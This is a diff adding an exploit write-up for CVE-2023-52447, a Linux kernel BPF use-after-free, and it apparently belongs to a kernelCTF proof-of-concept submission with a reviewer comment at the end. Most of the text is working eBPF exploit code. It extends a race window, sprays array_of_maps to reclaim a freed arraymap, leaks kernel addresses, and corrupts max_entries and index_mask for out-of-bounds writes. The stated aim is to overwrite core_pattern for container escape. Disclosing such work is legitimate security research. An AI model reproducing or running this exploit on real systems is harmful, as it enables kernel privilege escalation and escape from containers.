pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md

```diff
@@ -0,0 +1,183 @@
+BPF_LD_MAP_FD(BPF_REG_9, array_of_map),
+BPF_MAP_GET_ADDR(0, BPF_REG_8),
+BPF_MOV64_REG(BPF_REG_9, BPF_REG_8),
+BPF_MAP_GET_ADDR(0,BPF_REG_8),
+```
+
+`bpf_ringbuf_output` is a bpf function that use memcpy to copy buf to into another buf in line [1].    
+```C
+BPF_CALL_4(bpf_ringbuf_output, struct bpf_map *, map, void *, data, u64, size,
+	   u64, flags)
+{
+	struct bpf_ringbuf_map *rb_map;
+	void *rec;
+
+	if (unlikely(flags & ~(BPF_RB_NO_WAKEUP | BPF_RB_FORCE_WAKEUP)))
+		return -EINVAL;
+
+	rb_map = container_of(map, struct bpf_ringbuf_map, map);
+	rec = __bpf_ringbuf_reserve(rb_map->rb, size);
+	if (!rec)
+		return -EAGAIN;
+
+	memcpy(rec, data, size); //[1]
+	bpf_ringbuf_commit(rec, flags, false /* discard */);
+	return 0;
+}
+```
+
+If buf size is large, it will take some time to finish.  
+It will be a good choice to extend the race windows for release and reclaim.  
+
+```C
+// do time comsume operation using BPF_FUNC_ringbuf_output copy large size buffer
+BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
+BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),
+BPF_MOV64_IMM(BPF_REG_3, 0x10000000),
+BPF_MOV64_IMM(BPF_REG_4, 0x0),
+BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_output)
+```
+
+Another thread can free the arraymap and reclaim as array_of_maps.  
+And update its elem at index 0.
+
+```C
+	for (int i = 0; i < 0x100; i++) {
+		spray_fd[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4,
+					     0x30, samplemap);
+		update_elem(spray_fd[i], 0, victim);
+	}
+```
+
+Bpf program treats BPF_REG_8 stored map address as arrymap, but it's arry_of_maps.
+```C
+// Now BPF_REG_8 is freed and reallocate as array_of_map
+BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8,0), 
+```
+
+We can leak arrymap address and array_map_ops by malformed arraymap.
+
+```C
+BPF_LDX_MEM( BPF_DW, BPF_REG_0, BPF_REG_8, 0), // Now BPF_REG_8 is freed and reallocate as array_of_map
+BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 0), // store a arrymap address to our arrymap as value
+BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -0x110), // adjust address to make value as bpf_array.map
+BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_0,0), //store our malformed arraymap info array_of_maps
+```
+
+# Exploit Tech Detail
+
+The exploit after win the race
+
+* Modified victim arraymap's max_entries and index_mask.
+* Use victim arraymap to modified near array_of_maps's value index 0 arraymap as (core_pattern-struct_bpf_array_offset).
+* Update array_of_maps to modify core_pattern.
+* Achieve container escape.
+
+
+## Modified victim arraymap's max_entries and index_mask.
+
+As the value is adjust as bpf_array.map, so we can create a bpf program to modify map.max_entrieds and array->index_mask
+
+```C
+		BPF_LD_MAP_FD(BPF_REG_9, target),
+		BPF_MAP_GET_ADDR(0, BPF_REG_9),
+		BPF_MAP_GET_ADDR(4, BPF_REG_8),
+		BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0x800), //modify map.max_entries
+
+		BPF_MAP_GET_ADDR(0x20, BPF_REG_8),
+		BPF_ST_MEM(BPF_W, BPF_REG_8, 4,0xffff), //modify array->index_mask
```

Comment:
The new value written to array->index_mask is 0xffff. Can you explain why it's useful  for enabling out-of-bounds access?